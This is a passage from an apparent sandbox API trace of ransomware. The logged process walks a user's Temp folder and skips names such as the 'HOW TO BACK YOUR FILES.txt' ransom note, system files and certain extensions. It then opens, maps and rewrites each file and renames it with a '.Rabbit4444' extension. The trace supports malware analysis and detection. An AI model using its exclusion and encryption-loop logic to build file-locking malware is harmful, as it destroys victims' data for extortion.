(lpString1="g62RCL.ods", lpString2="boot") returned 1 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2="ids.txt") returned -1 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2="NTUSER.DAT") returned -1 [0055.610] lstrcpyW (in: lpString1=0x130eb7e, lpString2="g62RCL.ods" | out: lpString1="g62RCL.ods") returned="g62RCL.ods" [0055.610] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\g62RCL.ods", dwFileAttributes=0x0) returned 1 [0055.610] lstrlenW (lpString="g62RCL.ods") returned 10 [0055.610] lstrlenW (lpString="Rabbit4444") returned 10 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2="Rabbit4444") returned -1 [0055.610] lstrlenW (lpString=".dll") returned 4 [0055.610] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0055.610] lstrlenW (lpString=".lnk") returned 4 [0055.610] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0055.610] lstrlenW (lpString=".ini") returned 4 [0055.610] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0055.610] lstrlenW (lpString=".sys") returned 4 [0055.610] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0055.611] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\g62RCL.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\g62rcl.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.611] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.611] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14692146354) returned 1 [0055.611] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=52841) returned 1 [0055.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0055.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0055.611] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd170, lpName=0x0) returned 0x298 [0055.611] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd170) returned 0x70000 [0055.613] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.613] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0055.613] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.613] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0055.613] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.613] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0055.613] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0055.614] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14692431639) returned 1 [0055.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0055.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0055.614] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.614] CloseHandle (hObject=0x298) returned 1 [0055.614] CloseHandle (hObject=0x278) returned 1 [0055.615] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\g62RCL.ods.Rabbit4444") returned 56 [0055.615] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\g62RCL.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\g62rcl.ods"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\g62RCL.ods.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\g62rcl.ods.rabbit4444"), dwFlags=0x1) returned 1 [0055.616] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a5918e0, ftCreationTime.dwHighDateTime=0x1d4d3a1, ftLastAccessTime.dwLowDateTime=0x393de010, ftLastAccessTime.dwHighDateTime=0x1d4cf1b, ftLastWriteTime.dwLowDateTime=0x393de010, ftLastWriteTime.dwHighDateTime=0x1d4cf1b, nFileSizeHigh=0x0, nFileSizeLow=0x103e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HJlCCXK9.m4a", cAlternateFileName="")) returned 1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2="Rabbit4444.exe") returned -1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2=".") returned 1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2="..") returned 1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2="windows") returned -1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2="bootmgr") returned 1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2="pagefile.sys") returned -1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2="boot") returned 1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2="ids.txt") returned -1 [0055.616] lstrcmpiW (lpString1="HJlCCXK9.m4a", lpString2="NTUSER.DAT") returned -1 [0055.616] lstrcpyW (in: lpString1=0x130eb7e, lpString2="HJlCCXK9.m4a" | out: lpString1="HJlCCXK9.m4a") returned="HJlCCXK9.m4a" [0055.616] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\HJlCCXK9.m4a", dwFileAttributes=0x0) returned 1 [0055.616] lstrlenW (lpString="HJlCCXK9.m4a") returned 12 [0055.616] lstrlenW (lpString="Rabbit4444") returned 10 [0055.616] lstrcmpiW (lpString1="lCCXK9.m4a", lpString2="Rabbit4444") returned -1 [0055.616] lstrlenW (lpString=".dll") returned 4 [0055.616] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0055.616] lstrlenW (lpString=".lnk") returned 4 [0055.616] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0055.617] lstrlenW (lpString=".ini") returned 4 [0055.617] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0055.617] lstrlenW (lpString=".sys") returned 4 [0055.617] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0055.617] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\HJlCCXK9.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\hjlccxk9.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.617] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.617] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14692759082) returned 1 [0055.617] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=66532) returned 1 [0055.617] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0055.617] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0055.617] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x106f0, lpName=0x0) returned 0x298 [0055.617] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x106f0) returned 0x70000 [0055.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0055.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0055.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0055.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0055.619] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14692993211) returned 1 [0055.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0055.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0055.619] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.620] CloseHandle (hObject=0x298) returned 1 [0055.620] CloseHandle (hObject=0x278) returned 1 [0055.621] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\HJlCCXK9.m4a.Rabbit4444") returned 58 [0055.621] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\HJlCCXK9.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\hjlccxk9.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\HJlCCXK9.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\hjlccxk9.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0055.621] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685c4200, ftCreationTime.dwHighDateTime=0x1d4ca53, ftLastAccessTime.dwLowDateTime=0xa4925fc0, ftLastAccessTime.dwHighDateTime=0x1d4c8e1, ftLastWriteTime.dwLowDateTime=0xa4925fc0, ftLastWriteTime.dwHighDateTime=0x1d4c8e1, nFileSizeHigh=0x0, nFileSizeLow=0xeed6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kjcfUyRTkdNG.mp4", cAlternateFileName="KJCFUY~1.MP4")) returned 1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2="Rabbit4444.exe") returned -1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2=".") returned 1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2="..") returned 1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2="windows") returned -1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2="bootmgr") returned 1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2="pagefile.sys") returned -1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2="boot") returned 1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2="ids.txt") returned 1 [0055.621] lstrcmpiW (lpString1="kjcfUyRTkdNG.mp4", lpString2="NTUSER.DAT") returned -1 [0055.621] lstrcpyW (in: lpString1=0x130eb7e, lpString2="kjcfUyRTkdNG.mp4" | out: lpString1="kjcfUyRTkdNG.mp4") returned="kjcfUyRTkdNG.mp4" [0055.621] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kjcfUyRTkdNG.mp4", dwFileAttributes=0x0) returned 1 [0055.622] lstrlenW (lpString="kjcfUyRTkdNG.mp4") returned 16 [0055.622] lstrlenW (lpString="Rabbit4444") returned 10 [0055.622] lstrcmpiW (lpString1="RTkdNG.mp4", lpString2="Rabbit4444") returned 1 [0055.622] lstrlenW (lpString=".dll") returned 4 [0055.622] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0055.622] lstrlenW (lpString=".lnk") returned 4 [0055.622] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0055.622] lstrlenW (lpString=".ini") returned 4 [0055.622] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0055.622] lstrlenW (lpString=".sys") returned 4 [0055.622] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0055.622] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kjcfUyRTkdNG.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kjcfuyrtkdng.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.622] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.622] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14693299914) returned 1 [0055.622] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=61142) returned 1 [0055.622] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0055.622] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0055.622] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf1e0, lpName=0x0) returned 0x298 [0055.623] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf1e0) returned 0x70000 [0055.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0055.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0055.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0055.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0055.625] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14693559057) returned 1 [0055.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0055.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0055.625] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.626] CloseHandle (hObject=0x298) returned 1 [0055.626] CloseHandle (hObject=0x278) returned 1 [0055.626] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kjcfUyRTkdNG.mp4.Rabbit4444") returned 62 [0055.626] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kjcfUyRTkdNG.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kjcfuyrtkdng.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kjcfUyRTkdNG.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kjcfuyrtkdng.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0055.627] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91502fa0, ftCreationTime.dwHighDateTime=0x1d4d548, ftLastAccessTime.dwLowDateTime=0x78b54270, ftLastAccessTime.dwHighDateTime=0x1d4cee3, ftLastWriteTime.dwLowDateTime=0x78b54270, ftLastWriteTime.dwHighDateTime=0x1d4cee3, nFileSizeHigh=0x0, nFileSizeLow=0xc7c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ligXXA-u.docx", cAlternateFileName="LIGXXA~1.DOC")) returned 1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2="Rabbit4444.exe") returned -1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2=".") returned 1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2="..") returned 1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2="windows") returned -1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2="bootmgr") returned 1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2="pagefile.sys") returned -1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2="boot") returned 1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2="ids.txt") returned 1 [0055.627] lstrcmpiW (lpString1="ligXXA-u.docx", lpString2="NTUSER.DAT") returned -1 [0055.627] lstrcpyW (in: lpString1=0x130eb7e, lpString2="ligXXA-u.docx" | out: lpString1="ligXXA-u.docx") returned="ligXXA-u.docx" [0055.627] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ligXXA-u.docx", dwFileAttributes=0x0) returned 1 [0055.627] lstrlenW (lpString="ligXXA-u.docx") returned 13 [0055.627] lstrlenW (lpString="Rabbit4444") returned 10 [0055.627] lstrcmpiW (lpString1="XXA-u.docx", lpString2="Rabbit4444") returned 1 [0055.628] lstrlenW (lpString=".dll") returned 4 [0055.628] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0055.628] lstrlenW (lpString=".lnk") returned 4 [0055.628] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0055.628] lstrlenW (lpString=".ini") returned 4 [0055.628] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0055.628] lstrlenW (lpString=".sys") returned 4 [0055.628] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0055.628] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ligXXA-u.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ligxxa-u.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.628] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.628] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14693867372) returned 1 [0055.628] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=51137) returned 1 [0055.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0055.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0055.628] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcad0, lpName=0x0) returned 0x298 [0055.628] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcad0) returned 0x70000 [0055.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0055.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0055.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0055.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0055.630] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14694076549) returned 1 [0055.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0055.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0055.630] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.631] CloseHandle (hObject=0x298) returned 1 [0055.631] CloseHandle (hObject=0x278) returned 1 [0055.632] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ligXXA-u.docx.Rabbit4444") returned 59 [0055.632] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ligXXA-u.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ligxxa-u.docx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ligXXA-u.docx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ligxxa-u.docx.rabbit4444"), dwFlags=0x1) returned 1 [0055.632] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcea8e2f0, ftCreationTime.dwHighDateTime=0x1d4c9e7, ftLastAccessTime.dwLowDateTime=0xa28d66b0, ftLastAccessTime.dwHighDateTime=0x1d4c7de, ftLastWriteTime.dwLowDateTime=0xa28d66b0, ftLastWriteTime.dwHighDateTime=0x1d4c7de, nFileSizeHigh=0x0, nFileSizeLow=0x7263, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LPFVkW.rtf", cAlternateFileName="")) returned 1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2="Rabbit4444.exe") returned -1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2=".") returned 1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2="..") returned 1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2="windows") returned -1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2="bootmgr") returned 1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2="pagefile.sys") returned -1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2="boot") returned 1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2="ids.txt") returned 1 [0055.632] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2="NTUSER.DAT") returned -1 [0055.632] lstrcpyW (in: lpString1=0x130eb7e, lpString2="LPFVkW.rtf" | out: lpString1="LPFVkW.rtf") returned="LPFVkW.rtf" [0055.633] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\LPFVkW.rtf", dwFileAttributes=0x0) returned 1 [0055.633] lstrlenW (lpString="LPFVkW.rtf") returned 10 [0055.633] lstrlenW (lpString="Rabbit4444") returned 10 [0055.633] lstrcmpiW (lpString1="LPFVkW.rtf", lpString2="Rabbit4444") returned -1 [0055.633] lstrlenW (lpString=".dll") returned 4 [0055.633] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0055.633] lstrlenW (lpString=".lnk") returned 4 [0055.633] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0055.633] lstrlenW (lpString=".ini") returned 4 [0055.633] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0055.633] lstrlenW (lpString=".sys") returned 4 [0055.633] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0055.633] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\LPFVkW.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\lpfvkw.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.633] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.633] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14694394489) returned 1 [0055.633] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=29283) returned 1 [0055.633] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0055.633] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0055.633] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7570, lpName=0x0) returned 0x298 [0055.633] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7570) returned 0x70000 [0055.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0055.634] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0055.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0055.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0055.635] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14694555535) returned 1 [0055.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0055.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 